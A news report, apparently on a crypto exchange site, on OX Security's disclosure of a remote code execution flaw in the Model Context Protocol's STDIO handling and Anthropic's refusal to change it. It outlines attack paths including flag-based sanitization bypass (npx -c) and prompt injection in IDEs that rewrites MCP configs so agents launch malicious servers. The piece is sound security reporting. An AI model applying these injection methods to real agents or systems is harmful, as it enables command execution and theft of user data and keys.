Futures
Access hundreds of perpetual contracts
TradFi
Gold
One platform for global traditional assets
Options
Hot
Trade European-style vanilla options
Unified Account
Maximize your capital efficiency
Demo Trading
Introduction to Futures Trading
Learn the basics of futures trading
Futures Events
Join events to earn rewards
Demo Trading
Use virtual funds to practice risk-free trading
Launch
CandyDrop
Collect candies to earn airdrops
Launchpool
Quick staking, earn potential new tokens
HODLer Airdrop
Hold GT and get massive airdrops for free
Pre-IPOs
Unlock full access to global stock IPOs
Alpha Points
Trade on-chain assets and earn airdrops
Futures Points
Earn futures points and claim airdrop rewards
Promotions
AI
Gate AI
Your all-in-one conversational AI partner
Gate AI Bot
Use Gate AI directly in your social App
GateClaw
Gate Blue Lobster, ready to go
Gate for AI Agent
AI infrastructure, Gate MCP, Skills, and CLI
Gate Skills Hub
10K+ Skills
From office tasks to trading, the all-in-one skill hub makes AI even more useful.
GateRouter
Smartly choose from 30+ AI models, with 0% extra fees
MCP Protocol Reveals Design-Level RCE Vulnerability, Anthropic Refuses to Change Architecture
According to monitoring by Dongcha Beating, security company OX Security recently disclosed a design-level remote code execution (RCE) vulnerability in the Model Context Protocol (MCP), an open protocol led by Anthropic that serves as the de facto standard for AI agents calling external tools. Attackers can execute arbitrary commands on any system running a vulnerable MCP implementation, potentially accessing user data, internal databases, API keys, and chat logs. The vulnerability does not stem from coding errors by implementers but rather from the default behavior of the Anthropic official SDK when handling STDIO transmission. Versions in Python, TypeScript, Java, and Rust are all affected. STDIO is a transmission method of MCP that allows local processes to communicate through standard input and output. The StdioServerParameters in the official SDK directly launches subprocesses based on command parameters in the configuration, meaning that if developers do not perform additional input sanitization, any user input that reaches this point can become system commands. OX Security categorizes the attack surface into four types: direct command injection through the configuration interface; bypassing sanitization using allowed commands with flags (e.g., npx -c ); injecting prompts in IDEs to rewrite MCP configuration files, allowing tools like Windsurf to run malicious STDIO services without user interaction; and secretly injecting STDIO configurations through HTTP requests in the MCP marketplace. OX Security reports that affected software packages have been downloaded over 150 million times, with more than 7,000 publicly accessible MCP servers, exposing up to 200,000 instances across over 200 open-source projects. The team has submitted over 30 responsible disclosures and received more than 10 high or critical CVEs, covering AI frameworks and IDEs like LiteLLM, LangFlow, Flowise, Windsurf, GPT Researcher, Agent Zero, and DocsGPT. In testing 11 MCP package repositories, 9 were found to be vulnerable to this method of injecting malicious configurations. After the disclosure, Anthropic responded that this is ‘by design’, stating that the execution model of STDIO is a ‘secure default design’, and placed the responsibility for input sanitization on developers, refusing to make changes at the protocol or official SDK level. Vendors such as DocsGPT and LettaAI have already issued their own patches, while the default behavior of Anthropic’s reference implementation remains unchanged. MCP has become the de facto standard for AI agents interfacing with external tools, with OpenAI, Google, and Microsoft following suit. Without fixing the root cause, any MCP service using the official SDK’s default method to handle STDIO, even if the developer has not written a single line of erroneous code, could become an attack vector.